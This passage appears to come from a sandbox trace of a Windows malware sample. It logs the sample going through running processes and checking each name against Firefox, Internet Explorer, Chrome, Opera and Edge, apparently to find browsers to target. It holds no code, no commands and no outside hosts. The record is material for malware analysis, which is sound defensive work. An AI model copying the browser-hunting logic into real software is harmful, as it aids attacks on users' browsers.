dwFlags=0x0, szExeFile="System")) returned 1 [0186.370] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0186.370] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0186.370] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0186.370] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0186.370] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0186.370] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0186.370] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0186.370] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0186.370] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0186.370] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0186.370] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.370] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.371] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0186.371] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0186.371] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0186.371] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0186.371] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.371] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0186.371] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0186.371] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0186.371] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0186.371] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0186.371] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.371] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0186.372] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0186.372] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0186.372] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0186.372] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0186.372] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.372] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0186.372] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0186.373] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0186.373] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0186.373] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0186.373] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.373] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0186.373] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0186.373] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0186.373] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0186.373] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0186.373] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.373] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0186.374] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0186.374] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0186.374] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0186.374] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0186.374] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.374] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0186.375] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0186.375] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0186.375] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0186.375] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0186.375] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.375] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.375] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.376] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.376] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.376] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.377] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.377] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.377] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.377] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.377] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.377] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.378] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.378] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.378] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.378] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.378] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.378] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.379] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.379] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.379] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.379] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.379] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.379] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0186.380] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0186.380] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0186.380] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0186.380] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0186.380] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.380] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.380] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.380] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.380] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.380] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.380] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.381] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.381] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.381] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.381] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.381] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.381] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.381] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0186.383] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0186.383] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0186.383] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0186.383] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0186.383] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.383] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.384] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0186.384] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0186.384] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0186.384] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0186.384] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.384] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0186.384] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0186.384] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0186.384] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0186.385] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0186.385] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.385] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.385] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0186.385] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0186.385] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0186.385] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0186.385] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.386] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0186.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0186.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0186.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0186.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0186.386] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.386] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0186.387] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0186.387] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0186.387] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0186.387] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0186.387] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.387] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0186.387] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0186.387] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0186.387] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0186.387] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0186.387] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.387] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0186.388] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0186.388] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0186.388] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0186.388] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0186.388] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.388] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0186.388] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0186.388] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0186.389] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0186.389] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0186.389] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.389] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0186.389] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0186.389] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0186.389] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0186.389] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0186.389] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.389] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0186.390] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0186.390] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0186.390] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0186.390] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0186.390] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.390] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0186.390] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0186.390] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0186.390] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0186.390] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0186.390] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.390] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0186.391] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0186.391] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0186.391] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0186.391] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0186.391] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.391] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0186.391] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0186.391] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0186.391] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0186.391] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0186.391] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.392] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0186.392] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0186.392] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0186.392] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0186.392] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0186.392] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0186.392] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0186.393] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0186.393] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0186.393] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0186.393] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0186.393] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.393] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0186.393] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0186.393] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0186.393] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0186.393] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0186.393] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.393] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0186.394] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0186.394] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0186.394] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0186.394] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0186.394] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.394] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0186.394] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0186.394] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0186.394] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0186.394] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0186.394] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.394] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0186.395] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0186.395] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0186.395] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0186.395] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0186.395] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0186.395] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, 